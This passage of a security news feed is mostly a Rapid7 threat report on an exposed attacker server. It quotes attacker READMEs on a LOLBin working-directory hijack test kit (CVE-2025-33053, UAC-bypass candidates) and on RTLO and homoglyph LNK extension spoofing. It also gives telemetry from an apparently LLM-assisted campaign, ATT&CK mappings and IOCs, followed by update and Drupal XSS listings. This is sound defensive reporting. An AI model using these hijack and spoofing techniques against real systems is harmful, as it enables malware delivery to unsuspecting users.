  I28_WorkFolders.url         - LOLBAS Execute(EXE,Rename)
  I33_stordiag.url            - LOLBAS Execute(EXE) - calls systeminfo etc
  I36_Provlaunch.url          - LOLBAS Execute(CMD) - calls provtool.exe!

TIER 5 - UAC bypass binaries (worth testing):
  I49_fodhelper.url, I50_computerdefaults.url, I52_wsreset.url

═══════════════════════════════════════════════════════════════════
THE THEORY (so you understand WHY this works for some and not others)
═══════════════════════════════════════════════════════════════════

For the attack to succeed, the LOLBin must:
  1. Be a .NET application, OR call ShellExecute/CreateProcess with bare
     name (no full path).
  2. Spawn a child process by NAME (e.g. "ipconfig.exe") not by full path
     (e.g. "C:\Windows\System32\ipconfig.exe").
  3. Be runnable without command-line args.

If ANY of these is false, the hijack fails. Microsoft has been patching
specific binaries (iediagcmd.exe in June 2025) but the general pattern
remains. New vulnerable binaries are discovered regularly.

═══════════════════════════════════════════════════════════════════
WHAT THE POPUP TELLS YOU
═══════════════════════════════════════════════════════════════════

When hijack works, you'll see:
  TEST OK - Working Directory Hijack SUCCESS

  Executed as: route.exe                              &lt;- which name was hijacked
  Full path: \\[REDACTED]@80\Downloads\route.exe    &lt;- ran from WebDAV!
  Working dir: \\[REDACTED]@80\Downloads
  Parent process: iediagcmd                           &lt;- which LOLBin spawned it

═══════════════════════════════════════════════════════════════════
NOTES
═══════════════════════════════════════════════════════════════════

* Some I-files may target binaries that DON'T EXIST on your Win11 24H2
  (e.g. I02_CustomShellHost was missing on my test Server 2025).
  These will silently fail - just move on.

* Some I-files may launch the GUI tool (msconfig, dxdiag, etc.) WITHOUT
  triggering any hijack. That's fine - if no popup appears, no hijack.

* See _MAPPING.csv for full mapping of each .url to its target binary
  and expected child process names.</pre><p><span><em>Figure 7: Context of README.md found in the exposed directory.</em></span><em><br></em><br><span>The attacker left a build-time artifact inside the </span><span><span data-type="inlineCode">generate_test_lnk.ps1</span></span><span> output. The output directory is hardcoded in the </span><span><span data-type="inlineCode">$outDir</span></span><span> variable and exposes part of the attacker’s local project tree:</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-%24outDir-path.png" alt="Hardcoded-$outDir-path.png" caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f481d0cd28d6929/6a5e17f7b52ffd407785a683/Hardcoded-$outDir-path.png" data-sys-asset-uid="blt5f481d0cd28d6929" data-sys-asset-filename="Hardcoded-$outDir-path.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree." data-sys-asset-alt="Hardcoded-$outDir-path.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 8: Hardcoded $outDir path exposing the attacker’s local project tree.</figcaption></div></figure><p>⠀<em><br></em><span>It is therefore apparent that the entire campaign was likely created using the </span><a href="https://github.com/Akash-nath29/Coderrr" target="_blank"><span>CodeRRR project</span></a><span> with the help of LLM to assist with code generation and campaign development.</span></p><p><span>Another file we found in the directory was </span><span><span data-type="inlineCode">Simba_Service_Presentation.htm</span></span><span>, which appeared to document an attacker-controlled WebDAV delivery/admin panel. The panel also seems to have been generated with LLM assistance, based on its presentation-style formatting, API-documentation structure, emojis, and implementation details.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" alt="Simba-server-screenshot-panel.png" caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt8a0d6970395b2772/6a5e18471d6cdc8240fb0a26/Simba-server-screenshot-panel.png" data-sys-asset-uid="blt8a0d6970395b2772" data-sys-asset-filename="Simba-server-screenshot-panel.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture." data-sys-asset-alt="Simba-server-screenshot-panel.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 9: Screenshot from the panel with an open presentation about Simba service, showing its architecture.</figcaption></div></figure><p>⠀</p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" alt="Simba-server-system-requirements.png" caption="Figure 10: Simba service system requirements." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Simba-server-system-requirements.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c958992fad5cb62/6a5e18d6f480d88e07286a8a/Simba-server-system-requirements.png" data-sys-asset-uid="blt3c958992fad5cb62" data-sys-asset-filename="Simba-server-system-requirements.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 10: Simba service system requirements." data-sys-asset-alt="Simba-server-system-requirements.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 10: Simba service system requirements.</figcaption></div></figure><p>⠀</p><p><span>The most telling artifact was a “comprehensive test kit” that expanded the single CVE-2025-33053 technique into 59 </span><span><span data-type="inlineCode">.url</span></span><span> files targeting different Windows binaries, such as .NET tools (</span><span><span data-type="inlineCode">InstallUtil</span></span><span>, </span><span><span data-type="inlineCode">RegAsm</span></span><span>, </span><span><span data-type="inlineCode">RegSvcs</span></span><span>, </span><span><span data-type="inlineCode">ngentask</span></span><span>), system utilities, LOLBAS execute-EXE binaries, and even UAC-bypass candidates. Each file was paired with a stated theory of why the working-directory hijack should work and a priority order for testing.</span></p><p><span>The directory was saturated with structured README files, neatly formatted lure-generation guides, matrix-style test write-ups, emoji-heavy admin-panel documentation, and a </span><span><span data-type="inlineCode">_MAPPING.csv</span></span><span> tying each test file to its target binary and expected child process. The consistency, verbosity, and sheer volume of organized artifacts led us to conclude that the attacker likely used an LLM-assisted workflow to do much of the heavy lifting around documentation, structure, and iteration.</span></p><p></p><pre language="c"># LNK Full Matrix Test — WebDAV Open Methods + Deception Techniques

**Location:** `C:\Users\Administrator\Desktop\LNK-Full-Matrix-Test`  
**Total files:** 60  
**Generated:** 2026-05-30

---

## Overview / Обзор

This folder contains a complete test matrix of **60 LNK shortcut files** combining all available WebDAV open methods with all LNK Deception Techniques supported by the Web-renamer project.

В этой папке находится полная тестовая матрица из **60 LNK-ярлыков**, объединяющих все доступные WebDAV-методы открытия со всеми техниками обмана LNK, поддерживаемыми проектом Web-renamer.

---

## Naming Scheme / Схема именования

All files follow the pattern:  
Все файлы следуют шаблону:

```
HyperPackSetup.&lt;method&gt;.&lt;trick&gt;.&lt;spoof&gt;.lnk
```

- **`HyperPackSetup`** — base filename / базовое имя файла
- **`&lt;method&gt;`** — WebDAV open method (e.g. `curl-http-temp-run`, `direct`, `cmd-start`) / метод открытия WebDAV
- **`&lt;trick&gt;`** — LNK deception technique (`standard`, `SPOOFEXE_HIDEARGS_DISABLETARGET`, etc.) / техника обмана LNK
- **`&lt;spoof&gt;`** — RTLO + homoglyph extension spoof (`‮ƒｄᴘ`) — visually appears as `.pdf` / спуф расширения через RTLO + гомоглифы — визуально выглядит как `.pdf`
- **`.lnk`** — real extension / реальное расширение

&gt; The spoof is applied **only to the extension** at the end, so the method and trick names remain clearly readable.  
&gt; Спуф применяется **только к расширению** в конце имени, поэтому названия методов и техник остаются читаемыми.
...</pre><p><span><em>Figure 11: This is a snippet from another </em></span><span><span data-type="inlineCode"><em>README.md</em></span></span><span><em>. The full README is available on Rapid7 Labs' </em></span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank"><span><em>Github</em></span></a><span><em>. The text is original, and the translation to Russian was not added by us.</em></span></p><h3>OPSEC is hard </h3><p><span>As we mentioned previously, one of the artifacts we found in the open directory was a presentation file documenting a WebDAV delivery/admin panel called “Simba Service.”</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" alt="simba-service-presentation.png" caption="Figure 12: Simba service presentation." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-presentation.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte7a569d4a484149e/6a5e199e1abad5303f7de1ad/simba-service-presentation.png" data-sys-asset-uid="blte7a569d4a484149e" data-sys-asset-filename="simba-service-presentation.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 12: Simba service presentation." data-sys-asset-alt="simba-service-presentation.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 12: Simba service presentation.</figcaption></div></figure><p>⠀</p><p><span>The panel was built to manage a read-only WebDAV file share and track delivery activity in real time, including file opens, visitor IPs, geolocation, Windows versions, traffic, errors, folder-level conversion, and access events.</span></p><p><span>The actor not only used the same server for testing and staging files, but also recklessly left behind internal documentation for the backend used to manage and track delivery. The presentation reads like an internal build document, walking through the architecture, tech stack, API endpoints, authentication, logging, analytics, bug fixes, deployment setup, and panel access flow. It also included the panel IP and port, along with credentials.</span></p><p><span>Additionally, the file also looked like it was generated with an LLM. Its structured project overview, emoji-heavy sections, API-documentation format, and implementation details stood out. Basically, in some subfolders you can find LLM-generated READMEs with lures and malicious executables, while in another subfolder there is an admin panel with a hardcoded IP, port, and credentials.</span></p><p><span>We are intentionally withholding live access details, credentials, IP addresses, ports, and panel locations.</span></p><h3>Delivery panel overview</h3><p><span>The attacker appeared to have deployed the panel as-is, without changing the default password or port. The panel included several operator-facing sections: Review, Folders, Files, Visitors, Geography, Traffic/Server, Notes, File Manager, Users, Link Builder, Safety, and Documentation.</span></p><p><em></em></p><figure><div><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" alt="simba-service-page-with-blocking-capabilities_.png" caption="Figure 13: Simba service page with blocking capabilities." class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt20dc8a76cc4cdc10/6a5e1a005e34b09034dfd8cd/simba-service-page-with-blocking-capabilities_.png" data-sys-asset-uid="blt20dc8a76cc4cdc10" data-sys-asset-filename="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13: Simba service page with blocking capabilities." data-sys-asset-alt="simba-service-page-with-blocking-capabilities_.png" data-sys-asset-position="none" sys-style-type="display"><figcaption>Figure 13: Simba service page with blocking capabilities.</figcaption></div></figure><p>⠀</p><p><span>The portal was capable of detecting scanners and bots by analyzing behavioral indicators, including requests for non-existent resources, HTTP 404 responses, WebDAV probes, and directory enumeration attempts. Based on these observations, it assigned a risk score to each IP address and allowed the operator to manually block flagged hosts. Portal records indicate that the blocking configuration was modified at least 3 times during the campaign (June 5, June 10, and June 20).</span></p><p><span>We analyzed telemetry from the WebDAV delivery service over an approximately 5.5-day window (June 20–26, 2026 UTC), which recorded 77,098 requests from 3,892 unique client IPs across 101 countries, with roughly 45.9 GB transferred.</span></p><p><span>The activity was short-lived and high-volume, peaking between June 21 and June 24 before dropping sharply. Based on this data we can assume that it was a targeted delivery campaign.</span></p><p><span>Most of the launch activity came from one specific lure: a CURP-themed fake PDF report under the </span><span><span data-type="inlineCode">/Downloads/CURP/ReportFinal.rcs.pdf</span></span><span> (RTLO-spoofed </span><span><span data-type="inlineCode">.scr</span></span><span> executable.) Out of 2,441 observed executable launch events, 2,384, or approximately 97.7%, were tied to this lure. It accounted for approximately 14.6 GB of traffic and was accessed by 1,869 unique client IPs.</span></p><p><span>The WebDAV traffic was heavily concentrated in Mexico. Mexico generated 63,622 requests, representing 82.5% of all traffic, and 2,365 launch events, or approximately 96.9% of all observed launches. The next largest sources of traffic, including the United States and Germany, produced far fewer launch events and appeared more consistent with scanning, research, or automated retrieval.</span></p><p><em></em></p><table><colgroup data-width="1250"><col><col><col><col><col></colgroup><tbody><tr><td><p><span><strong>Country</strong></span></p></td><td><p><span><strong>Requests</strong></span></p></td><td><p><span><strong>Share of requests</strong></span></p></td><td><p><span><strong>Unique client IPs</strong></span></p></td><td><p><span><strong>Launch events</strong></span></p></td></tr><tr><td><p><span>Mexico</span></p></td><td><p><span>63,622</span></p></td><td><p><span>82.5%</span></p></td><td><p><span>2,698</span></p></td><td><p><span>2,365</span></p></td></tr><tr><td><p><span>United States</span></p></td><td><p><span>4,032</span></p></td><td><p><span>5.2%</span></p></td><td><p><span>463</span></p></td><td><p><span>47</span></p></td></tr><tr><td><p><span>Germany</span></p></td><td><p><span>2,751</span></p></td><td><p><span>3.6%</span></p></td><td><p><span>59</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>United Kingdom</span></p></td><td><p><span>645</span></p></td><td><p><span>0.8%</span></p></td><td><p><span>40</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Netherlands</span></p></td><td><p><span>532</span></p></td><td><p><span>0.7%</span></p></td><td><p><span>49</span></p></td><td><p><span>1</span></p></td></tr><tr><td><p><span>France</span></p></td><td><p><span>407</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>21</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Finland</span></p></td><td><p><span>401</span></p></td><td><p><span>0.5%</span></p></td><td><p><span>6</span></p></td><td><p><span>10</span></p></td></tr><tr><td><p><span>Brazil</span></p></td><td><p><span>343</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>41</span></p></td><td><p><span>0</span></p></td></tr><tr><td><p><span>Republic of Korea</span></p></td><td><p><span>312</span></p></td><td><p><span>0.4%</span></p></td><td><p><span>16</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 3: Geographic distribution of WebDAV delivery activity.</em></span></p><p><span><em></em></span></p><p><span>Mexico was not only the largest source of traffic, but also the source of nearly all observed launch activity. Within Mexico, the activity was geographically broad, spanning hundreds of cities rather than clustering around a single locality. The top five Mexican cities accounted for approximately 27.4% of Mexican launch events, with Mexico City alone accounting for approximately 15.7%.</span></p><p><span>Hourly requests to the WebDAV delivery service also supported the assessment that much of the traffic came from real user interaction rather than only automated internet scanners. Traffic peaked between 16:00 and 19:00 UTC, which corresponds to working hours in central Mexico.</span></p><p><span>By launch events, we mean cases where the WebDAV panel showed that a client opened or requested an executable file in a way that looked like an attempted run, such as a </span><span><span data-type="inlineCode">GET</span></span><span> request for an </span><span><span data-type="inlineCode">.scr</span></span><span> or </span><span><span data-type="inlineCode">.exe</span></span><span> file from the delivery share. This does not mean we confirmed malware execution on the endpoint. It means the delivery infrastructure saw the file being accessed or invoked.</span></p><h2>Protocol behavior</h2><p><span>The HTTP methods and status codes show how clients interacted with the WebDAV delivery service. </span><span><span data-type="inlineCode">PROPFIND</span></span><span> requests and </span><span><span data-type="inlineCode">207</span></span><span> responses indicate directory browsing, which is typical when Windows Explorer accesses a remote WebDAV location. </span><span><span data-type="inlineCode">GET</span></span><span> requests and </span><span><span data-type="inlineCode">200</span></span><span> responses show file retrieval, including executable files opened or requested from the share.</span></p><p><span></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Method</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>PROPFIND</span></p></td><td><p><span>57,287</span></p></td></tr><tr><td><p><span>GET</span></p></td><td><p><span>13,088</span></p></td></tr><tr><td><p><span>OPTIONS</span></p></td><td><p><span>6,597</span></p></td></tr><tr><td><p><span>PROPPATCH</span></p></td><td><p><span>125</span></p></td></tr><tr><td><p><span>LOCK</span></p></td><td><p><span>1</span></p></td></tr></tbody></table><p><span><em>Table 4: HTTP methods observed in WebDAV delivery traffic.</em></span></p><p><span><em></em></span></p><table><colgroup data-width="500"><col><col></colgroup><tbody><tr><td><p><span><strong>Status</strong></span></p></td><td><p><span><strong>Count</strong></span></p></td></tr><tr><td><p><span>207</span></p></td><td><p><span>57,412</span></p></td></tr><tr><td><p><span>200</span></p></td><td><p><span>19,532</span></p></td></tr><tr><td><p><span>206</span></p></td><td><p><span>154</span></p></td></tr></tbody></table><p><span><em>Table 5: HTTP status codes observed in WebDAV delivery traffic.</em></span></p><h2><span>MITRE ATT&amp;CK techniques</span></h2><table><colgroup data-width="1010"><col><col><col></colgroup><tbody><tr><td><p><span><strong>Name</strong></span></p></td><td><p><span><strong>MITRE ATT&amp;CK technique</strong></span></p></td><td><p><span><strong>Code</strong></span></p></td></tr><tr><td><p><span>Payload execution</span></p></td><td><p><span>User Execution: Malicious File</span></p></td><td><p><span>T1204.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Right-to-Left Override</span></p></td><td><p><span>T1036.002</span></p></td></tr><tr><td><p><span>Masquerading</span></p></td><td><p><span>Double File Extension</span></p></td><td><p><span>T1036.007</span></p></td></tr><tr><td><p><span>DLL sideloading</span></p></td><td><p><span>Hijack Execution Flow: DLL</span></p></td><td><p><span>T1574.001</span></p></td></tr><tr><td><p><span>Obfuscation</span></p></td><td><p><span>Encrypted/Encoded File</span></p></td><td><p><span>T1027.013</span></p></td></tr><tr><td><p><span>Payload unpacking</span></p></td><td><p><span>Deobfuscate/Decode Files or Information</span></p></td><td><p><span>T1140</span></p></td></tr><tr><td><p><span>Payload carrier</span></p></td><td><p><span>Steganography / image-carried payload data</span></p></td><td><p><span>T1027.003</span></p></td></tr><tr><td><p><span>API hiding</span></p></td><td><p><span>Dynamic API Resolution</span></p></td><td><p><span>T1027.007</span></p></td></tr><tr><td><p><span>In-memory loading</span></p></td><td><p><span>Reflective Code Loading</span></p></td><td><p><span>T1620</span></p></td></tr><tr><td><p><span>Injection</span></p></td><td><p><span>Process Hollowing</span></p></td><td><p><span>T1055.012</span></p></td></tr><tr><td><p><span>Native API use</span></p></td><td><p><span>Native API</span></p></td><td><p><span>T1106</span></p></td></tr><tr><td><p><span>Sandbox evasion</span></p></td><td><p><span>Time Based Evasion</span></p></td><td><p><span>T1497.003</span></p></td></tr><tr><td><p><span>Anti-analysis</span></p></td><td><p><span>Debugger / instrumentation checks</span></p></td><td><p><span>T1622</span></p></td></tr><tr><td><p><span>UAC bypass</span></p></td><td><p><span>Bypass User Account Control</span></p></td><td><p><span>T1548.002</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Registry Run Keys / Startup Folder</span></p></td><td><p><span>T1547.001</span></p></td></tr><tr><td><p><span>Persistence</span></p></td><td><p><span>Scheduled Task</span></p></td><td><p><span>T1053.005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Keylogging</span></p></td><td><p><span>T1056.001</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Screen Capture</span></p></td><td><p><span>T1113</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Clipboard Data</span></p></td><td><p><span>T1115</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Credentials from Web Browsers</span></p></td><td><p><span>T1555.003</span></p></td></tr><tr><td><p><span>Credential access</span></p></td><td><p><span>Steal Web Session Cookie</span></p></td><td><p><span>T1539</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Data from Local System</span></p></td><td><p><span>T1005</span></p></td></tr><tr><td><p><span>Collection</span></p></td><td><p><span>Automated Collection</span></p></td><td><p><span>T1119</span></p></td></tr><tr><td><p><span>Staging</span></p></td><td><p><span>Archive Collected Data: Archive via Utility</span></p></td><td><p><span>T1560.001</span></p></td></tr><tr><td><p><span>C2</span></p></td><td><p><span>Encrypted Channel</span></p></td><td><p><span>T1573</span></p></td></tr><tr><td><p><span>Exfiltration</span></p></td><td><p><span>Exfiltration Over C2 Channel</span></p></td><td><p><span>T1041</span></p></td></tr><tr><td><p><span>Possible persistence</span></p></td><td><p><span>WMI Event Subscription</span></p></td><td><p><span>T1546.003</span></p></td></tr><tr><td><p><span>Phishing lure generation</span></p></td><td><p><span>Generate Phishing Lures</span></p></td><td><p><span>AML.T0052</span></p></td></tr><tr><td><p><span>Resource Development</span></p></td><td><p><span>Resource Development</span></p></td><td><p><span>AML.TA0003</span></p></td></tr><tr><td><p><span>Obtain capabilities via LLM tooling</span></p></td><td><p><span>Obtain Capabilities</span></p></td><td><p><span>AML.T0016</span></p></td></tr><tr><td><p><span>LLM-assisted capability development</span></p></td><td><p><span>Develop Capabilities</span></p></td><td><p><span> AML.T0017</span></p></td></tr><tr><td><p><span>LLM prompt crafting for attack documentation</span></p></td><td><p><span>LLM Prompt Crafting</span></p></td><td><p><span>AML.T0065</span></p></td></tr><tr><td><p><span>Obtain capabilities via tooling</span></p></td><td><p><span>Obtain Capabilities: Software Tools</span></p></td><td><p><span>AML.T0016.001</span></p></td></tr></tbody></table><h2><span>Indicators of compromise (IOCs)</span></h2><h3>CURP campaign</h3><p>Phishing page: hxxps://gobf[.]mx </p><p>WebDav server: onedrive[.]cv</p><p></p><p>ReportFinal.&lt;RLO&gt;.scr    SHA256 04A8018191F2E9E76072D072A933371D9D669A42DE2B2A087541CD3A653B0BA7</p><p></p><p>C2: 77.110.127.205 ports 56001-56003 / 57666 / 57777 / 57888</p><p>Domain: google.services[.]ug</p><p>Campaign tag:06x12x2026SantaEbash2  (v4.4.3)</p><p>Schedule tasks: brokerhost, net_queue_32</p><p></p><p>Staging paths:</p><p>%TEMP%\is-XXXXX.tmp\Fo-Binary.exe </p><p>%AppData%\Roaming\inttracer_i686_prod\      </p><p> C:\ProgramData\inttracer_i686_prod\</p><h3>DlrtyGames campaign </h3><p>C2: 23[.]94[.]252[.]228:57666</p><p>JA3: fc54e0d16d9764783542f0146a98b300</p><p>DlrtyGames.exe</p><p>SHA256: e8be17a7fbef48b45f1e958b3ae5ebdfcad58808969982c431a905eefcae5268</p><p>discord-rpc.x64.dll</p><p>SHA256: 449d1121fa275879af22a20407aa7253ac750ac8fa7ff5691101752600d645df</p><p>profiler16.dll</p><p>SHA256: a88f5ee748e60f889d046718bfe3ddcf1c5f3cba2001cad587e8953a76bf7aa9</p><p>loader-pool.db</p><p>SHA256: 51a02eccdcae0483c7cbb9796738eee6c2a13b740d30e5417cda09bf418ea93b</p><p>.NET RAT</p><p>SHA256: 82e67735cf822db8f2f759e742e5bf8c54fdbd01a4170619b9e0916e1b3f5923</p><p>Staging paths:</p><p>C:\ProgramData\basenet\</p><p>%APPDATA%\basenet\</p><p>Persistence:</p><p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run\XNNNMHJAZNCNHGIKJDW</p><p>\com_app_bg_i686</p><p>\messenger_component_v8_32_rc</p><p></p><p>More indicators of compromise can be found on Rapid7’s <a href="https://github.com/rapid7/Rapid7-Labs/tree/main/IOCs/Simba%20Panel" target="_blank">GitHub</a>.</p><h2>Rapid7 customers</h2><p>Customers using Rapid7’s Intelligence Hub gain direct access to all IOCs from this campaign, including any future indicators as they are identified.</p><h2>Conclusion</h2><p><span>The operator’s OPSEC failed in the best way possible for defenders. Thanks to a completely exposed server, we managed to pull down their entire operational toolkit: staged payloads, lure templates, testing files, builder notes, and active campaign artifacts. This sloppiness effectively offered a rare, transparent view of their end-to-end delivery pipeline rather than just the final malware it served.</span></p><p><span>The real impact shows up in speed and scale. The actor generated lure variants in bulk, tested them systematically, documented results, and refined delivery techniques in short cycles. The artifacts also suggested that attackers used LLM for rapid lure generation and development since their cPanel was vibecoded. </span></p><p><span>While the fact that attackers are adopting genAI in their workflows is nothing new, looking past the novelty reveals a much more practical shift in adversary operations.</span></p><p><span>The takeaway isn’t that “AI wrote the malware.” It’s that the attacker used LLMs to operate more like a modern software product team. The use of genAI enables them to prototype, test, and scale their delivery pipeline at a fast pace.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (kernel, libnfs, roundcube, and tiff), Fedora (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-ast...]]></description>
<link>https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 20 Jul 2026 15:10:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (kernel, libnfs, roundcube, and tiff), <b>Fedora</b> (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-astral_async_zip, spoofdpi, uv, and yq), <b>Mageia</b> (bind, clamav, erlang, libidn, libreoffice, nmap, nodejs, perl-Bytes-Random-Secure, perl-Config-IniFiles, perl-CSS-Minifier-XS, perl-HTML-Parser, perl-Mojolicious, perl-String-Util, python-pydantic-settings, rsync, and upower), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, cockpit, cockpit-image-builder, coreutils, delve, dnsmasq, dovecot, expat, fence-agents, flatpak, frr, gdk-pixbuf2, giflib, glib2, go-fdo-client and go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, httpd, jq, kernel, keylime, krb5, libcap, libexif, libpng, libsndfile, libsolv, libsoup3, libtasn1, libtiff, libxslt, libyang, mariadb10.11, mod_http2, mod_md, opencryptoki, PackageKit, perl-Archive-Tar, perl-IO-Compress, poppler, postfix, postgresql-jdbc, python-urllib3, python3.14, python3.14-pip, python3.14-urllib3, qt6-qtdeclarative, rrdtool, rsync, ruby, ruby4.0, samba, skopeo, thunderbird, valkey, wireshark, xorg-x11-server-Xwayland, and yggdrasil-worker-package-manager), and <b>SUSE</b> (blender, chromium, containerized-data-importer1, cyrus-imapd, go1.26-openssl, gomuks, grafana, gstreamer-plugins-bad, kbfs, kubevirt1.8-container-disk, libxml2, lux, mariadb-connector-c, nginx, opam, openssl-3, oras, perl-DBI, php-composer2, python-django-haystack, python-paramiko, python-weasyprint, python311, python313-Pillow, python315, shibboleth-sp, system-user-zabbix, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[Drupal core - Moderately critical - Cross-site scripting - SA-CORE-2026-012]]></title>
<description><![CDATA[The Layout Builder module doesn't sufficiently sanitize block labels in certain scenarios, which can lead to a cross-site scripting (XSS) vulnerability.
This is mitigated by the fact that both the attacker and the targeted user need to be using the Layout Builder editing interface.

    This vuln...]]></description>
<link>https://tsecurity.de/de/3680327/sicherheitsluecken/drupal-core-moderately-critical-cross-site-scripting-sa-core-2026-012/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680327/sicherheitsluecken/drupal-core-moderately-critical-cross-site-scripting-sa-core-2026-012/</guid>
<pubDate>Mon, 20 Jul 2026 07:55:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Layout Builder module doesn't sufficiently sanitize block labels in certain scenarios, which can lead to a cross-site scripting (XSS) vulnerability.
<br>This is mitigated by the fact that both the attacker and the targeted user need to be using the Layout Builder editing interface.</p>

    <p>This vulnerability affects the following application versions:</p>
    <ul>
        
            <li>Drupal 8.7.0</li>
        
            <li>Drupal 8.7.1</li>
        
            <li>Drupal 8.7.2</li>
        
            <li>Drupal 8.7.3</li>
        
            <li>Drupal 8.7.4</li>
        
            <li>Drupal 8.7.5</li>
        
            <li>Drupal 8.7.6</li>
        
            <li>Drupal 8.7.7</li>
        
            <li>Drupal 8.7.8</li>
        
            <li>Drupal 8.7.9</li>
        
            <li>Drupal 8.7.10</li>
        
            <li>Drupal 8.7.11</li>
        
            <li>Drupal 8.7.12</li>
        
            <li>Drupal 8.7.13</li>
        
            <li>Drupal 8.7.14</li>
        
            <li>Drupal 8.8.0</li>
        
            <li>Drupal 8.8.1</li>
        
            <li>Drupal 8.8.2</li>
        
            <li>Drupal 8.8.3</li>
        
            <li>Drupal 8.8.4</li>
        
            <li>Drupal 8.8.5</li>
        
            <li>Drupal 8.8.6</li>
        
            <li>Drupal 8.8.7</li>
        
            <li>Drupal 8.8.8</li>
        
            <li>Drupal 8.8.9</li>
        
            <li>Drupal 8.8.10</li>
        
            <li>Drupal 8.8.11</li>
        
            <li>Drupal 8.8.12</li>
        
            <li>Drupal 8.9.0</li>
        
            <li>Drupal 8.9.1</li>
        
            <li>Drupal 8.9.2</li>
        
            <li>Drupal 8.9.3</li>
        
            <li>Drupal 8.9.4</li>
        
            <li>Drupal 8.9.5</li>
        
            <li>Drupal 8.9.6</li>
        
            <li>Drupal 8.9.7</li>
        
            <li>Drupal 8.9.8</li>
        
            <li>Drupal 8.9.9</li>
        
            <li>Drupal 8.9.10</li>
        
            <li>Drupal 8.9.11</li>
        
            <li>Drupal 8.9.12</li>
        
            <li>Drupal 8.9.13</li>
        
            <li>Drupal 8.9.14</li>
        
            <li>Drupal 8.9.15</li>
        
            <li>Drupal 8.9.16</li>
        
            <li>Drupal 8.9.17</li>
        
            <li>Drupal 8.9.18</li>
        
            <li>Drupal 8.9.19</li>
        
            <li>Drupal 8.9.20</li>
        
            <li>Drupal 9.0.0</li>
        
            <li>Drupal 9.0.1</li>
        
